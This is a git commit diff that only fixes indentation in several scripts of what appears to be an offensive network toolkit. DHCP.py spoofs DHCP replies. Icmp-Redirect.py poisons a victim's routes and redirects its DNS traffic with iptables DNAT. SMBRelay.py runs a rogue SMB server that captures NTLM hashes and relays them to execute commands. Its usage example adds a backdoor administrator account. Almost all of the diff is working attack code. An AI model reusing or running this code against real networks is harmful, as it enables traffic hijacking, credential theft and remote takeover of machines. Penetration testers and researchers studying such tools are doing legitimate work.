fixed: identation.

2025-08-20 13:23:38 -07:00 · 2014-06-09 22:16:01 -04:00 · 2014-06-09 22:16:01 -04:00 · 5c9fec923c
commit 5c9fec923c
parent 4558861ce2
4 changed files with 1870 additions and 1875 deletions
--- a/DHCP.py
+++ b/DHCP.py
@ -50,29 +50,29 @@ def ShowWelcome():
    print Message
 if options.OURIP is None:
-   print "\n\033[1m\033[31m-i mandatory option is missing, please provide your IP address.\033[0m\n"
+    print "\n\033[1m\033[31m-i mandatory option is missing, please provide your IP address.\033[0m\n"
-   parser.print_help()
+    parser.print_help()
-   exit(-1)
+    exit(-1)
 if options.Interface is None:
-   print "\n\033[1m\033[31m-I mandatory option is missing, please provide an interface.\033[0m\n"
+    print "\n\033[1m\033[31m-I mandatory option is missing, please provide an interface.\033[0m\n"
-   parser.print_help()
+    parser.print_help()
-   exit(-1)
+    exit(-1)
 if options.RouterIP is None:
-   print "\n\033[1m\033[31m-r mandatory option is missing, please provide the router's IP.\033[0m\n"
+    print "\n\033[1m\033[31m-r mandatory option is missing, please provide the router's IP.\033[0m\n"
-   parser.print_help()
+    parser.print_help()
-   exit(-1)
+    exit(-1)
 if options.DNSIP is None:
-   print "\n\033[1m\033[31m-p mandatory option is missing, please provide the primary DNS server ip address or yours.\033[0m\n"
+    print "\n\033[1m\033[31m-p mandatory option is missing, please provide the primary DNS server ip address or yours.\033[0m\n"
-   parser.print_help()
+    parser.print_help()
-   exit(-1)
+    exit(-1)
 if options.DNSIP2 is None:
-   print "\n\033[1m\033[31m-s mandatory option is missing, please provide the secondary DNS server ip address or yours.\033[0m\n"
+    print "\n\033[1m\033[31m-s mandatory option is missing, please provide the secondary DNS server ip address or yours.\033[0m\n"
-   parser.print_help()
+    parser.print_help()
-   exit(-1)
+    exit(-1)
 ShowWelcome()
@ -96,25 +96,25 @@ Spoof = options.Spoof
 Request = options.Request
 if Spoof:
-   DHCPSERVER = ROUTERIP
+    DHCPSERVER = ROUTERIP
 def SpoofIP(Spoof):
    if Spoof:
-       return ROUTERIP
+        return ROUTERIP
    else:
-       return OURIP 
+        return OURIP
 def RespondToSpecificHost(RespondTo):
    if len(RespondTo)>=1 and RespondTo != ['']:
-       return True
+        return True
    else:
-       return False
+        return False
 def RespondToIPScope(RespondTo, ClientIp):
    if ClientIp in RespondTo:
-       return True
+        return True
    else:
-       return False
+        return False
 class Packet():
    fields = OrderedDict([
@ -270,16 +270,16 @@ def ParseMac(data):
 def IsUDP(data):
    if data[0][23:24] == "\x11":
-       return True
+        return True
    if data[0][23:24] == "\x06":
-       return False
+        return False
 def ParseSrcDSTAddr(data):
-     SrcIP = inet_ntoa(data[0][26:30])
+    SrcIP = inet_ntoa(data[0][26:30])
-     DstIP = inet_ntoa(data[0][30:34])
+    DstIP = inet_ntoa(data[0][30:34])
-     SrcPort = struct.unpack('>H',data[0][34:36])[0]
+    SrcPort = struct.unpack('>H',data[0][34:36])[0]
-     DstPort = struct.unpack('>H',data[0][36:38])[0]
+    DstPort = struct.unpack('>H',data[0][36:38])[0]
-     return SrcIP,SrcPort,DstIP,DstPort
+    return SrcIP,SrcPort,DstIP,DstPort
 def FindIP(data):
    IP = ''.join(re.findall('(?<=\x32\x04)[^EOF]*', data))
@ -294,88 +294,86 @@ def ParseDHCPCode(data):
    OpCode = data[242:243]
    RequestIP = data[245:249]
    if OpCode == "\x08":
-       i = IPHead(SrcIP = inet_aton(SpoofIP(Spoof)), DstIP=inet_aton(CurrentIP))
+        i = IPHead(SrcIP = inet_aton(SpoofIP(Spoof)), DstIP=inet_aton(CurrentIP))
-       p = DHCPInformACK(Tid=PTid,ClientMac=MacAddr, ActualClientIP=inet_aton(CurrentIP), GiveClientIP=inet_aton("0.0.0.0"), NextServerIP=inet_aton("0.0.0.0"),RelayAgentIP=inet_aton("0.0.0.0"),BootpFlags="\x00\x00",ElapsedSec=Seconds)
+        p = DHCPInformACK(Tid=PTid,ClientMac=MacAddr, ActualClientIP=inet_aton(CurrentIP), GiveClientIP=inet_aton("0.0.0.0"), NextServerIP=inet_aton("0.0.0.0"),RelayAgentIP=inet_aton("0.0.0.0"),BootpFlags="\x00\x00",ElapsedSec=Seconds)
-       p.calculate()
+        p.calculate()
-       u = UDP(Data = p)
+        u = UDP(Data = p)
-       u.calculate()
+        u.calculate()
-       for x in range(1):
+        for x in range(1):
-          SendDHCP(str(i)+str(u),(CurrentIP,68))
+            SendDHCP(str(i)+str(u),(CurrentIP,68))
-       return '\033[1m\033[31mDHCP Inform received:\033[0m Current IP:%s Requested IP:%s Mac Address:%s Tid:%s'%(CurrentIP,RequestedIP,'-'.join('%02x' % ord(m) for m in MacAddr),'0x'+PTid.encode('hex'))
+        return '\033[1m\033[31mDHCP Inform received:\033[0m Current IP:%s Requested IP:%s Mac Address:%s Tid:%s'%(CurrentIP,RequestedIP,'-'.join('%02x' % ord(m) for m in MacAddr),'0x'+PTid.encode('hex'))
    if OpCode == "\x03":
-       if Request:
+        if Request:
-          IP = FindIP(data)
+            IP = FindIP(data)
-          if IP:
+            if IP:
-             IPConv = inet_ntoa(IP)
+                IPConv = inet_ntoa(IP)
-             if RespondToSpecificHost(RespondTo) and RespondToIPScope(RespondTo, IPConv):
+                if RespondToSpecificHost(RespondTo) and RespondToIPScope(RespondTo, IPConv):
-                i = IPHead(SrcIP = inet_aton(SpoofIP(Spoof)), DstIP=IP)
+                    i = IPHead(SrcIP = inet_aton(SpoofIP(Spoof)), DstIP=IP)
-                p = DHCPACK(Tid=PTid,ClientMac=MacAddr, GiveClientIP=IP,BootpFlags="\x00\x00",ElapsedSec=Seconds)
+                    p = DHCPACK(Tid=PTid,ClientMac=MacAddr, GiveClientIP=IP,BootpFlags="\x00\x00",ElapsedSec=Seconds)
-                p.calculate()
+                    p.calculate()
-                u = UDP(Data = p)
+                    u = UDP(Data = p)
-                u.calculate()
+                    u.calculate()
-                for x in range(1):
+                    for x in range(1):
-                   SendDHCP(str(i)+str(u),(IPConv,68))
+                        SendDHCP(str(i)+str(u),(IPConv,68))
-                return '\033[1m\033[31mIn-scope DHCP Request received:\033[0m Requested IP: %s Mac Address: %s Tid: %s'%(IPConv,'-'.join('%02x' % ord(m) for m in MacAddr),'0x'+PTid.encode('hex'))
+                    return '\033[1m\033[31mIn-scope DHCP Request received:\033[0m Requested IP: %s Mac Address: %s Tid: %s'%(IPConv,'-'.join('%02x' % ord(m) for m in MacAddr),'0x'+PTid.encode('hex'))
-             if RespondToSpecificHost(RespondTo) == False:
+                if RespondToSpecificHost(RespondTo) == False:
-                i = IPHead(SrcIP = inet_aton(SpoofIP(Spoof)), DstIP=IP)
+                    i = IPHead(SrcIP = inet_aton(SpoofIP(Spoof)), DstIP=IP)
-                p = DHCPACK(Tid=PTid,ClientMac=MacAddr, GiveClientIP=IP,BootpFlags="\x00\x00",ElapsedSec=Seconds)
+                    p = DHCPACK(Tid=PTid,ClientMac=MacAddr, GiveClientIP=IP,BootpFlags="\x00\x00",ElapsedSec=Seconds)
-                p.calculate()
+                    p.calculate()
-                u = UDP(Data = p)
+                    u = UDP(Data = p)
-                u.calculate()
+                    u.calculate()
-                for x in range(1):
+                    for x in range(1):
-                   SendDHCP(str(i)+str(u),(IPConv,68))
+                        SendDHCP(str(i)+str(u),(IPConv,68))
-                return '\033[1m\033[31mDHCP Request received:\033[0m Requested IP: %s Mac Address: %s Tid: %s'%(IPConv,'-'.join('%02x' % ord(m) for m in MacAddr),'0x'+PTid.encode('hex'))
+                    return '\033[1m\033[31mDHCP Request received:\033[0m Requested IP: %s Mac Address: %s Tid: %s'%(IPConv,'-'.join('%02x' % ord(m) for m in MacAddr),'0x'+PTid.encode('hex'))
    if OpCode == "\x01":
-       if Request:
+        if Request:
-          IP = FindIP(data)
+            IP = FindIP(data)
-          if IP:
+            if IP:
-             IPConv = inet_ntoa(IP)
+                IPConv = inet_ntoa(IP)
-             if RespondToSpecificHost(RespondTo) and RespondToIPScope(RespondTo, IPConv):
+                if RespondToSpecificHost(RespondTo) and RespondToIPScope(RespondTo, IPConv):
-                i = IPHead(SrcIP = inet_aton(SpoofIP(Spoof)), DstIP=IP)
+                    i = IPHead(SrcIP = inet_aton(SpoofIP(Spoof)), DstIP=IP)
-                p = DHCPACK(Tid=PTid,ClientMac=MacAddr, GiveClientIP=IP,BootpFlags="\x00\x00", DHCPOpCode="\x02", ElapsedSec=Seconds)
+                    p = DHCPACK(Tid=PTid,ClientMac=MacAddr, GiveClientIP=IP,BootpFlags="\x00\x00", DHCPOpCode="\x02", ElapsedSec=Seconds)
-                p.calculate()
+                    p.calculate()
-                u = UDP(Data = p)
+                    u = UDP(Data = p)
-                u.calculate()
+                    u.calculate()
-                for x in range(1):
+                    for x in range(1):
-                   SendDHCP(str(i)+str(u),(IPConv,0))
+                        SendDHCP(str(i)+str(u),(IPConv,0))
-                return '\033[1m\033[31mIn-scope DHCP Discover received:\033[0m Requested IP: %s Mac Address: %s Tid: %s'%(IPConv,'-'.join('%02x' % ord(m) for m in MacAddr),'0x'+PTid.encode('hex'))
+                    return '\033[1m\033[31mIn-scope DHCP Discover received:\033[0m Requested IP: %s Mac Address: %s Tid: %s'%(IPConv,'-'.join('%02x' % ord(m) for m in MacAddr),'0x'+PTid.encode('hex'))
-             if RespondToSpecificHost(RespondTo) == False:
+                if RespondToSpecificHost(RespondTo) == False:
-                i = IPHead(SrcIP = inet_aton(SpoofIP(Spoof)), DstIP=IP)
+                    i = IPHead(SrcIP = inet_aton(SpoofIP(Spoof)), DstIP=IP)
-                p = DHCPACK(Tid=PTid,ClientMac=MacAddr, GiveClientIP=IP,BootpFlags="\x00\x00", DHCPOpCode="\x02", ElapsedSec=Seconds)
+                    p = DHCPACK(Tid=PTid,ClientMac=MacAddr, GiveClientIP=IP,BootpFlags="\x00\x00", DHCPOpCode="\x02", ElapsedSec=Seconds)
-                p.calculate()
+                    p.calculate()
-                u = UDP(Data = p)
+                    u = UDP(Data = p)
-                u.calculate()
+                    u.calculate()
-                for x in range(1):
+                    for x in range(1):
-                   SendDHCP(str(i)+str(u),(IPConv,0))
+                        SendDHCP(str(i)+str(u),(IPConv,0))
-                return '\033[1m\033[31mDHCP Discover received:\033[0m Requested IP: %s Mac Address: %s Tid: %s'%(IPConv,'-'.join('%02x' % ord(m) for m in MacAddr),'0x'+PTid.encode('hex'))
+                    return '\033[1m\033[31mDHCP Discover received:\033[0m Requested IP: %s Mac Address: %s Tid: %s'%(IPConv,'-'.join('%02x' % ord(m) for m in MacAddr),'0x'+PTid.encode('hex'))
    else:
-       return False
+        return False
 def SendDHCP(packet,Host):
-   Protocol = 0x0800
+    Protocol = 0x0800
-   s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
+    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
-   s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
+    s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
-   s.sendto(packet, Host)
+    s.sendto(packet, Host)
 def SniffUDPMac():
    s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
    Protocol = 0x0800
    s.bind((Interface, Protocol))
    while True:
-       data = s.recvfrom(65535)
+        data = s.recvfrom(65535)
-       if IsUDP(data):
+        if IsUDP(data):
-          SrcIP,SrcPort,DstIP,DstPort =  ParseSrcDSTAddr(data)
+            SrcIP,SrcPort,DstIP,DstPort =  ParseSrcDSTAddr(data)
-          if SrcPort == 67 or DstPort == 67:
+            if SrcPort == 67 or DstPort == 67:
-             Message = ParseDHCPCode(data[0][42:])
+                Message = ParseDHCPCode(data[0][42:])
-             if Message:
+                if Message:
-                print 'DHCP Packet:\nSource IP/Port : %s:%s Destination IP/Port: %s:%s'%(SrcIP,SrcPort,DstIP,DstPort)
+                    print 'DHCP Packet:\nSource IP/Port : %s:%s Destination IP/Port: %s:%s'%(SrcIP,SrcPort,DstIP,DstPort)
-                print Message
+                    print Message
 SniffUDPMac()
--- a/Icmp-Redirect.py
+++ b/Icmp-Redirect.py
@ -43,32 +43,32 @@ parser.add_option('-a', '--alternate',action="store", help="The alternate gatewa
 options, args = parser.parse_args()
 if options.OURIP is None:
-   print "-i mandatory option is missing.\n"
+    print "-i mandatory option is missing.\n"
-   parser.print_help()
+    parser.print_help()
-   exit(-1)
+    exit(-1)
 if options.OriginalGwAddr is None:
-   print "-g mandatory option is missing, please provide the original gateway address.\n"
+    print "-g mandatory option is missing, please provide the original gateway address.\n"
-   parser.print_help()
+    parser.print_help()
-   exit(-1)
+    exit(-1)
 if options.VictimIP is None:
-   print "-t mandatory option is missing, please provide a target.\n"
+    print "-t mandatory option is missing, please provide a target.\n"
-   parser.print_help()
+    parser.print_help()
-   exit(-1)
+    exit(-1)
 if options.Interface is None:
-   print "-I mandatory option is missing, please provide your network interface.\n"
+    print "-I mandatory option is missing, please provide your network interface.\n"
-   parser.print_help()
+    parser.print_help()
-   exit(-1)
+    exit(-1)
 if options.ToThisHost is None:
-   print "-r mandatory option is missing, please provide a destination target.\n"
+    print "-r mandatory option is missing, please provide a destination target.\n"
-   parser.print_help()
+    parser.print_help()
-   exit(-1)
+    exit(-1)
 if options.AlternateGwAddr is None:
-   AlternateGwAddr = options.OURIP
+    AlternateGwAddr = options.OURIP
 #Setting some vars.
 OURIP = options.OURIP
@ -80,9 +80,9 @@ ToThisHost2 = options.ToThisHost2
 Interface = options.Interface
 def Show_Help(ExtraHelpData):
-   help = "\nICMP Redirect Utility 0.1.\nCreated by Laurent Gaffie, please send bugs/comments to lgaffie@trustwave.com\n\nThis utility combined with Responder is useful when you're sitting on a Windows based network.\nMost Linux distributions discard by default ICMP Redirects.\n"
+    help = "\nICMP Redirect Utility 0.1.\nCreated by Laurent Gaffie, please send bugs/comments to lgaffie@trustwave.com\n\nThis utility combined with Responder is useful when you're sitting on a Windows based network.\nMost Linux distributions discard by default ICMP Redirects.\n"
-   help+= ExtraHelpData
+    help+= ExtraHelpData
-   print help
+    print help
 MoreHelp = "Note that if the target is Windows, the poisoning will only last for 10mn, you can re-poison the target by launching this utility again\nIf you wish to respond to the traffic, for example DNS queries your target issues, launch this command as root:\n\niptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst %s --dport 53 -j DNAT --to-destination %s:53\n\n"%(ToThisHost,OURIP)
@ -212,15 +212,15 @@ def ReceiveArpFrame(DstAddr):
    Arp.calculate()
    final = str(Eth)+str(Arp)
    try:
-       s.send(final)
+        s.send(final)
-       data = s.recv(1024)
+        data = s.recv(1024)
-       DstMac = data[22:28]
+        DstMac = data[22:28]
-       DestMac = DstMac.encode('hex')
+        DestMac = DstMac.encode('hex')
-       PrintMac = ":".join([DestMac[x:x+2] for x in xrange(0, len(DestMac), 2)])
+        PrintMac = ":".join([DestMac[x:x+2] for x in xrange(0, len(DestMac), 2)])
-       return PrintMac,DstMac
+        return PrintMac,DstMac
    except:
-       print "[ARP]%s took too long to Respond. Please provide a valid host.\n"%(DstAddr)
+        print "[ARP]%s took too long to Respond. Please provide a valid host.\n"%(DstAddr)
-       exit(1)
+        exit(1)
 def IcmpRedirectSock(DestinationIP):
    PrintMac,DestMac = ReceiveArpFrame(VictimIP)
@ -243,12 +243,12 @@ def IcmpRedirectSock(DestinationIP):
 def FindWhatToDo(ToThisHost2):
    if ToThisHost2 != None:
-       Show_Help('Hit CRTL-C to kill this script')
+        Show_Help('Hit CRTL-C to kill this script')
-       RunThisInLoop(ToThisHost, ToThisHost2,OURIP)
+        RunThisInLoop(ToThisHost, ToThisHost2,OURIP)
    if ToThisHost2 == None:
-       Show_Help(MoreHelp)
+        Show_Help(MoreHelp)
-       IcmpRedirectSock(DestinationIP=ToThisHost)
+        IcmpRedirectSock(DestinationIP=ToThisHost)
-       exit()
+        exit()
 def RunThisInLoop(host, host2, ip):
    dns1 = pipes.quote(host)
@ -258,10 +258,9 @@ def RunThisInLoop(host, host2, ip):
    call("iptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst "+dns2+" --dport 53 -j DNAT --to-destination "+ouripadd+":53", shell=True)
    print "[+]Automatic mode enabled\nAn iptable rules has been added for both DNS servers."
    while True:
-       IcmpRedirectSock(DestinationIP=dns1)
+        IcmpRedirectSock(DestinationIP=dns1)
-       IcmpRedirectSock(DestinationIP=dns2)
+        IcmpRedirectSock(DestinationIP=dns2)
-       print "[+]Repoisoning the target in 8 minutes..."
+        print "[+]Repoisoning the target in 8 minutes..."
-       sleep(480)
+        sleep(480)
 FindWhatToDo(ToThisHost2)
--- a/Responder.py
+++ b/Responder.py
--- a/SMBRelay.py
+++ b/SMBRelay.py
@ -21,13 +21,13 @@ from socket import *
 from RelayPackets import *
 def UserCallBack(op, value, dmy, parser):
-        args=[]
+    args=[]
-        for arg in parser.rargs:
+    for arg in parser.rargs:
-                if arg[0] != "-":
+        if arg[0] != "-":
-                        args.append(arg)
+            args.append(arg)
-        if getattr(parser.values, op.dest):
+    if getattr(parser.values, op.dest):
-                args.extend(getattr(parser.values, op.dest))
+        args.extend(getattr(parser.values, op.dest))
-        setattr(parser.values, op.dest, args)
+    setattr(parser.values, op.dest, args)
 parser = optparse.OptionParser(usage="python %prog -i 10.20.30.40 -c 'net user Responder Quol0eeP/e}X /add &&net localgroup administrators Responder /add' -t 10.20.30.45 -u Administrator lgandx admin",
                               prog=sys.argv[0],
@ -45,19 +45,19 @@ parser.add_option('-u', '--UserToRelay', action="callback", callback=UserCallBac
 options, args = parser.parse_args()
 if options.CMD is None:
-   print "\n-c mandatory option is missing, please provide a command to execute on the target.\n"
+    print "\n-c mandatory option is missing, please provide a command to execute on the target.\n"
-   parser.print_help()
+    parser.print_help()
-   exit(-1)
+    exit(-1)
 if options.TARGET is None:
-   print "\n-t mandatory option is missing, please provide a target.\n"
+    print "\n-t mandatory option is missing, please provide a target.\n"
-   parser.print_help()
+    parser.print_help()
-   exit(-1)
+    exit(-1)
 if options.UserToRelay is None:
-   print "\n-u mandatory option is missing, please provide a username to relay.\n"
+    print "\n-u mandatory option is missing, please provide a username to relay.\n"
-   parser.print_help()
+    parser.print_help()
-   exit(-1)
+    exit(-1)
 ResponderPATH = os.path.dirname(__file__)
 # Set some vars.
@ -93,76 +93,76 @@ Logs.basicConfig(filemode="w",filename='SMBRelay-Session.txt',format='',level=lo
 #Function used to verify if a previous auth attempt was made.
 def ReadData(outfile,Client, User, cmd=None):
    try:
-       with open(ResponderPATH+outfile,"r") as filestr:
+        with open(ResponderPATH+outfile,"r") as filestr:
-          if cmd == None:
+            if cmd == None:
-             String = Client+':'+User
+                String = Client+':'+User
-             if re.search(String.encode('hex'), filestr.read().encode('hex')):
+                if re.search(String.encode('hex'), filestr.read().encode('hex')):
-                filestr.close()
+                    filestr.close()
-                return True
+                    return True
-             else:
+                else:
-                return False
+                    return False
-          if cmd != None:
+            if cmd != None:
-             String = Client+","+User+","+cmd
+                String = Client+","+User+","+cmd
-             if re.search(String.encode('hex'), filestr.read().encode('hex')):
+                if re.search(String.encode('hex'), filestr.read().encode('hex')):
-                filestr.close()
+                    filestr.close()
-                print "[+] Command: %s was previously executed on host: %s. Won't execute again.\n" %(cmd, Client)
+                    print "[+] Command: %s was previously executed on host: %s. Won't execute again.\n" %(cmd, Client)
-                return True
+                    return True
-             else:
+                else:
-                return False           
+                    return False
    except:
-       raise
+        raise
 #Function used to parse SMB NTLMv1/v2
 def ParseHash(data,Client, Target):
-  try:
+    try:
-    lenght = struct.unpack('<H',data[43:45])[0]
+        lenght = struct.unpack('<H',data[43:45])[0]
-    LMhashLen = struct.unpack('<H',data[51:53])[0]
+        LMhashLen = struct.unpack('<H',data[51:53])[0]
-    NthashLen = struct.unpack('<H',data[53:55])[0]
+        NthashLen = struct.unpack('<H',data[53:55])[0]
-    Bcc = struct.unpack('<H',data[63:65])[0]
+        Bcc = struct.unpack('<H',data[63:65])[0]
-    if NthashLen >= 30:
+        if NthashLen >= 30:
-       Hash = data[65+LMhashLen:65+LMhashLen+NthashLen]
+            Hash = data[65+LMhashLen:65+LMhashLen+NthashLen]
-       pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2]
+            pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2]
-       var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]]
+            var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]]
-       Username, Domain = tuple(var)
+            Username, Domain = tuple(var)
-       if ReadData("SMBRelay-Session.txt", Client, Username):
+            if ReadData("SMBRelay-Session.txt", Client, Username):
-          print "[+]Auth from user %s with host %s previously failed. Won't relay."%(Username, Client)
+                print "[+]Auth from user %s with host %s previously failed. Won't relay."%(Username, Client)
-          pass
+                pass
-       if Username in UserToRelay:
+            if Username in UserToRelay:
-          print '%s sent a NTLMv2 Response..\nVictim OS is : %s. Passing credentials to: %s'%(Client,RunSmbFinger((Client, 445)),Target)
+                print '%s sent a NTLMv2 Response..\nVictim OS is : %s. Passing credentials to: %s'%(Client,RunSmbFinger((Client, 445)),Target)
-          print "Username : ",Username
+                print "Username : ",Username
-          print "Domain (if joined, if not then computer name) : ",Domain
+                print "Domain (if joined, if not then computer name) : ",Domain
-          return data[65:65+LMhashLen],data[65+LMhashLen:65+LMhashLen+NthashLen],Username,Domain, Client
+                return data[65:65+LMhashLen],data[65+LMhashLen:65+LMhashLen+NthashLen],Username,Domain, Client
-    if NthashLen == 24:
+        if NthashLen == 24:
-       pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2]
+            pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2]
-       var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]]
+            var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]]
-       Username, Domain = tuple(var)
+            Username, Domain = tuple(var)
-       if ReadData("SMBRelay-Session.txt", Client, Username):
+            if ReadData("SMBRelay-Session.txt", Client, Username):
-          print "Auth from user %s with host %s previously failed. Won't relay."%(Username, Client)
+                print "Auth from user %s with host %s previously failed. Won't relay."%(Username, Client)
-          pass
+                pass
-       if Username in UserToRelay:
+            if Username in UserToRelay:
-          print '%s sent a NTLMv1 Response..\nVictim OS is : %s. Passing credentials to: %s'%(Client,RunSmbFinger((Client, 445)),Target)
+                print '%s sent a NTLMv1 Response..\nVictim OS is : %s. Passing credentials to: %s'%(Client,RunSmbFinger((Client, 445)),Target)
-          LMHashing = data[65:65+LMhashLen].encode('hex').upper()
+                LMHashing = data[65:65+LMhashLen].encode('hex').upper()
-          NTHashing = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()
+                NTHashing = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()
-          print "Username : ",Username
+                print "Username : ",Username
-          print "Domain (if joined, if not then computer name) : ",Domain
+                print "Domain (if joined, if not then computer name) : ",Domain
-          return data[65:65+LMhashLen],data[65+LMhashLen:65+LMhashLen+NthashLen],Username,Domain, Client
+                return data[65:65+LMhashLen],data[65+LMhashLen:65+LMhashLen+NthashLen],Username,Domain, Client
-       else:
+            else:
-          print "'%s' user was not specified in -u option, won't relay authentication. Allowed users to relay are: %s"%(Username,UserToRelay)
+                print "'%s' user was not specified in -u option, won't relay authentication. Allowed users to relay are: %s"%(Username,UserToRelay)
-          pass
+                pass
-  except Exception:
+    except Exception:
-    raise
+        raise
 #Detect if SMB auth was Anonymous
 def Is_Anonymous(data):
    LMhashLen = struct.unpack('<H',data[51:53])[0]
    if LMhashLen == 0 or LMhashLen == 1:
-       print "SMB Anonymous login requested, trying to force client to auth with credz."
+        print "SMB Anonymous login requested, trying to force client to auth with credz."
-       return True
+        return True
    else:
-       return False
+        return False
 def ParseDomain(data):
    Domain = ''.join(data[81:].split('\x00\x00\x00')[:1])+'\x00\x00\x00'
@ -175,71 +175,71 @@ def Parse_Nego_Dialect(data):
    var = [e.replace('\x00','') for e in DialectStart.split('\x02')[:10]]
    test = tuple(var)
    if test[0] == "NT LM 0.12":
-       return "\x00\x00"
+        return "\x00\x00"
    if test[1] == "NT LM 0.12":
-       return "\x01\x00"
+        return "\x01\x00"
    if test[2] == "NT LM 0.12":
-       return "\x02\x00"
+        return "\x02\x00"
    if test[3] == "NT LM 0.12":
-       return "\x03\x00"
+        return "\x03\x00"
    if test[4] == "NT LM 0.12":
-       return "\x04\x00"
+        return "\x04\x00"
    if test[5] == "NT LM 0.12":
-       return "\x05\x00"
+        return "\x05\x00"
    if test[6] == "NT LM 0.12":
-       return "\x06\x00"
+        return "\x06\x00"
    if test[7] == "NT LM 0.12":
-       return "\x07\x00"
+        return "\x07\x00"
    if test[8] == "NT LM 0.12":
-       return "\x08\x00"
+        return "\x08\x00"
    if test[9] == "NT LM 0.12":
-       return "\x09\x00"
+        return "\x09\x00"
    if test[10] == "NT LM 0.12":
-       return "\x0a\x00"
+        return "\x0a\x00"
 def SmbRogueSrv139(key,Target,DomainMachineName):
    s = socket(AF_INET,SOCK_STREAM)
    s.setsockopt(SOL_SOCKET,SO_REUSEADDR, 1)
    s.settimeout(30)
    try:
-       s.bind(('0.0.0.0', 139))
+        s.bind(('0.0.0.0', 139))
-       s.listen(0)
+        s.listen(0)
-       conn, addr = s.accept()
+        conn, addr = s.accept()
    except error, msg:
-       if "Address already in use" in msg:
+        if "Address already in use" in msg:
-          print '\033[31m'+'Something is already listening on TCP 139, did you set SMB = Off in Responder.conf..?\nSMB Relay will not work.'+'\033[0m'
+            print '\033[31m'+'Something is already listening on TCP 139, did you set SMB = Off in Responder.conf..?\nSMB Relay will not work.'+'\033[0m'
    try:
-       while True:
+        while True:
-         data = conn.recv(1024)
+            data = conn.recv(1024)
-         ##session request 139
+            ##session request 139
-         if data[0] == "\x81":
+            if data[0] == "\x81":
-            buffer0 = "\x82\x00\x00\x00"         
+                buffer0 = "\x82\x00\x00\x00"
-            conn.send(buffer0)
+                conn.send(buffer0)
-         ##Negotiate proto answer.
+            ##Negotiate proto answer.
-         if data[8:10] == "\x72\x00":
+            if data[8:10] == "\x72\x00":
-            head = SMBHeader(cmd="\x72",flag1="\x98", flag2="\x53\xc8",pid=pidcalc(data),tid=tidcalc(data))
+                head = SMBHeader(cmd="\x72",flag1="\x98", flag2="\x53\xc8",pid=pidcalc(data),tid=tidcalc(data))
-            t = SMBNegoAns(Dialect=Parse_Nego_Dialect(data),Key=key,Domain=DomainMachineName)
+                t = SMBNegoAns(Dialect=Parse_Nego_Dialect(data),Key=key,Domain=DomainMachineName)
-            t.calculate()
+                t.calculate()
-            packet1 = str(head)+str(t)
+                packet1 = str(head)+str(t)
-            buffer1 = longueur(packet1)+packet1
+                buffer1 = longueur(packet1)+packet1
-            conn.send(buffer1)
+                conn.send(buffer1)
-            ##Session Setup AndX Request
+                ##Session Setup AndX Request
-         if data[8:10] == "\x73\x00":
+            if data[8:10] == "\x73\x00":
-            if Is_Anonymous(data):
+                if Is_Anonymous(data):
-               head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x03\xc8",errorcode="\x6d\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
+                    head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x03\xc8",errorcode="\x6d\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
-               packet1 = str(head)+str(SMBSessEmpty())
+                    packet1 = str(head)+str(SMBSessEmpty())
-               buffer1 = longueur(packet1)+packet1  
+                    buffer1 = longueur(packet1)+packet1
-               conn.send(buffer1)
+                    conn.send(buffer1)
-            else:
+                else:
-               head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x03\xc8",errorcode="\x6d\x00\x00\xC0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
+                    head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x03\xc8",errorcode="\x6d\x00\x00\xC0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
-               packet1 = str(head)+str(SMBSessEmpty())#Return login fail anyways.
+                    packet1 = str(head)+str(SMBSessEmpty())#Return login fail anyways.
-               buffer1 = longueur(packet1)+packet1  
+                    buffer1 = longueur(packet1)+packet1
-               conn.send(buffer1)
+                    conn.send(buffer1)
-               Credz = ParseHash(data,addr[0],Target)
+                    Credz = ParseHash(data,addr[0],Target)
-               return Credz
+                    return Credz
    except:
-       return None
+        return None
 def RunRelay(host, Command,Domain):
    Target = host
@ -257,67 +257,67 @@ def RunRelay(host, Command,Domain):
    Key = ParseAnswerKey(data,host)
    DomainMachineName = ParseDomain(data)
    if data[8:10] == "\x72\x00":
-       try: 
+        try:
-          a = SmbRogueSrv139(Key,Target,DomainMachineName)
+            a = SmbRogueSrv139(Key,Target,DomainMachineName)
-          if a is not None:
+            if a is not None:
-             LMHash,NTHash,Username,OriginalDomain, CLIENTIP = a
+                LMHash,NTHash,Username,OriginalDomain, CLIENTIP = a
-             if Domain == None:
+                if Domain == None:
-                Domain = OriginalDomain
+                    Domain = OriginalDomain
-             if ReadData("SMBRelay-Session.txt", Target, Username, CMD):
+                if ReadData("SMBRelay-Session.txt", Target, Username, CMD):
-                pass
+                    pass
-             else:
+                else:
-                head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x03\xc8",pid="\xff\xfe",mid="\x01\x00")
+                    head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x03\xc8",pid="\xff\xfe",mid="\x01\x00")
